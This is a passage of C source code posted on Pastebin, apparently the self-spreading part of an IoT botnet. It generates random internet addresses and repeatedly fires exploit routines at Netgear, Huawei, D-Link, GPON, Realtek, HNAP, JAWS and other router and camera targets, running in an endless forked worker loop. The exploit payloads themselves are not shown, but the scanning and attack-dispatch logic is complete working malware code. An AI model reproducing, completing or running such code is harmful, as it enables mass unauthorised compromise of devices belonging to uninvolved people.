  441.     ipState[30] = rand() % 255;ipState[31] = rand() % 255;ipState[32] = rand() % 233;ipState[33] = rand() % 255;ipState[34] = rand() % 255;
  442.     ipState[35] = rand() % 255;ipState[36] = rand() % 233;ipState[37] = rand() % 255;ipState[38] = rand() % 255;ipState[39] = rand() % 255;
  443.    
  444.     sprintf(netgear_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(netgear_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);
  445.     sprintf(netgear_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(netgear_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);
  446.     sprintf(netgear_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(netgear_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]);
  447.     sprintf(netgear_ip7, "%d.%d.%d.%d", ipState[24], ipState[25], ipState[26], ipState[27]);sprintf(netgear_ip8, "%d.%d.%d.%d", ipState[28], ipState[29], ipState[30], ipState[31]);
  448.     sprintf(netgear_ip9, "%d.%d.%d.%d", ipState[32], ipState[33], ipState[34], ipState[35]);sprintf(netgear_ip10, "%d.%d.%d.%d", ipState[36], ipState[37], ipState[38], ipState[39]);
  449.    
  450.     exploit_socket_netgear(netgear_ip1);exploit_socket_netgear(netgear_ip2);exploit_socket_netgear(netgear_ip3);exploit_socket_netgear(netgear_ip4);exploit_socket_netgear(netgear_ip5);
  451.     exploit_socket_netgear(netgear_ip6);exploit_socket_netgear(netgear_ip7);exploit_socket_netgear(netgear_ip8);exploit_socket_netgear(netgear_ip9);exploit_socket_netgear(netgear_ip10);
  452. }
  453.  
  454. void HUAWEI_IPGen()
  455. {  
  456.     char huawei_ip1[16] = {0};char huawei_ip2[16] = {0};char huawei_ip3[16] = {0};char huawei_ip4[16] = {0};char huawei_ip5[16] = {0};
  457.  
  458.     srand(time(NULL));
  459.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[4] = rand() % 233;
  460.     ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;ipState[8] = rand() % 233;ipState[9] = rand() % 255;
  461.     ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[12] = rand() % 233;ipState[13] = rand() % 255;ipState[14] = rand() % 255;
  462.     ipState[15] = rand() % 255;ipState[16] = rand() % 233;ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;
  463.    
  464.     sprintf(huawei_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(huawei_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);
  465.     sprintf(huawei_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(huawei_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);
  466.     sprintf(huawei_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);
  467.    
  468.     exploit_socket_huawei(huawei_ip1);
  469.     exploit_socket_huawei(huawei_ip2);
  470.     exploit_socket_huawei(huawei_ip3);
  471.     exploit_socket_huawei(huawei_ip4);
  472.     exploit_socket_huawei(huawei_ip5);
  473. }
  474.  
  475. void TR064_IPGen()
  476. {  
  477.     char tr_ip1[16] = {0};
  478.  
  479.     srand(time(NULL));
  480.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;
  481.     ipState[2] = rand() % 255;ipState[3] = rand() % 255;
  482.    
  483.     sprintf(tr_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  484.    
  485.     exploit_socket_tr064(tr_ip1);
  486. }
  487.  
  488. void HNAP_IPGen()
  489. {  
  490.     char hnap_ip1[16] = {0};
  491.  
  492.     srand(time(NULL));
  493.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;
  494.     ipState[2] = rand() % 255;ipState[3] = rand() % 255;
  495.    
  496.     sprintf(hnap_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  497.    
  498.     exploit_socket_hnap(hnap_ip1);
  499. }
  500.  
  501. void CROSSWEB_IPGen()
  502. {  
  503.     char crossweb_ip1[16] = {0};
  504.  
  505.     srand(time(NULL));
  506.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;
  507.     ipState[2] = rand() % 255;ipState[3] = rand() % 255;
  508.    
  509.     sprintf(crossweb_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  510.    
  511.     exploit_socket_crossweb(crossweb_ip1);
  512. }
  513.  
  514. void JAWS_IPGen()
  515. {  
  516.     char jaws_ip1[16] = {0};
  517.  
  518.     srand(time(NULL));
  519.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;
  520.     ipState[2] = rand() % 255;ipState[3] = rand() % 255;
  521.    
  522.     sprintf(jaws_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  523.    
  524.     exploit_socket_jaws(jaws_ip1);
  525. }
  526.  
  527. void DLINK_IPGen()
  528. {  
  529.     char dlink_ip1[16] = {0};
  530.  
  531.     srand(time(NULL));
  532.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;
  533.     ipState[2] = rand() % 255;ipState[3] = rand() % 255;
  534.    
  535.     sprintf(dlink_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  536.    
  537.     exploit_socket_dlink(dlink_ip1);
  538. }
  539.  
  540. void R7000_IPGen()
  541. {  
  542.     char r7000_ip1[16] = {0};
  543.  
  544.     srand(time(NULL));
  545.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;
  546.     ipState[2] = rand() % 255;ipState[3] = rand() % 255;
  547.    
  548.     sprintf(r7000_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  549.    
  550.     exploit_socket_r7064(r7000_ip1);
  551. }
  552.  
  553. void VARCON_IPGen()
  554. {  
  555.     char varcon_ip1[16] = {0};
  556.  
  557.     srand(time(NULL));
  558.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;
  559.     ipState[2] = rand() % 255;ipState[3] = rand() % 255;
  560.    
  561.     sprintf(varcon_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  562.    
  563.     exploit_socket_vacron(varcon_ip1);
  564. }
  565.  
  566. void exploit_worker(void)
  567. {  
  568.     int i = 0;
  569.     exploit_pid = fork();
  570.    
  571.     if (exploit_pid > 0 || exploit_pid == -1)
  572.         return;
  573.     restart:
  574.     i++;
  575.     if (i > 10)
  576.     {
  577.         printf("[Pwn] Sleeping For 12 Seconds\n");
  578.         sleep(12);
  579.         i = i - 10;
  580.         goto restart;
  581.     }
  582.         usleep(300000);
  583.         GPON8080_IPGen();
  584.         usleep(300000);
  585.         GPON80_IPGen();
  586.         usleep(300000);
  587.         REALTEK_IPGen();
  588.         usleep(300000);
  589.         NETGEAR_IPGen();
  590.         usleep(300000);
  591.         HUAWEI_IPGen();
  592.         usleep(300000);
  593.         TR064_IPGen();
  594.         usleep(300000);
  595.         HNAP_IPGen();
  596.         usleep(300000);
  597.         CROSSWEB_IPGen();
  598.         usleep(300000);
  599.         JAWS_IPGen();
  600.         usleep(300000);
  601.         DLINK_IPGen();
  602.         usleep(300000);
  603.         R7000_IPGen();
  604.         usleep(300000);
  605.         VARCON_IPGen();
  606.         goto restart;
  607. }
  608.  
  609. void exploit_kill(void)
  610. {
  611.     kill(exploit_pid, 9);
  612. }
  613.  
  614. int main(int argc, char const *argv[])
  615. {
  616.     exploit_worker();
  617.     char prev = 0;
  618.     while(1)
  619.         {
  620.             char c = getchar();
  621.             if(c == '\n' && prev == c)
  622.             {
  623.             // double return pressed!
  624.                 break;
  625.             }
  626.             prev = c;
  627.         }
  628.     return 0;
  629. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!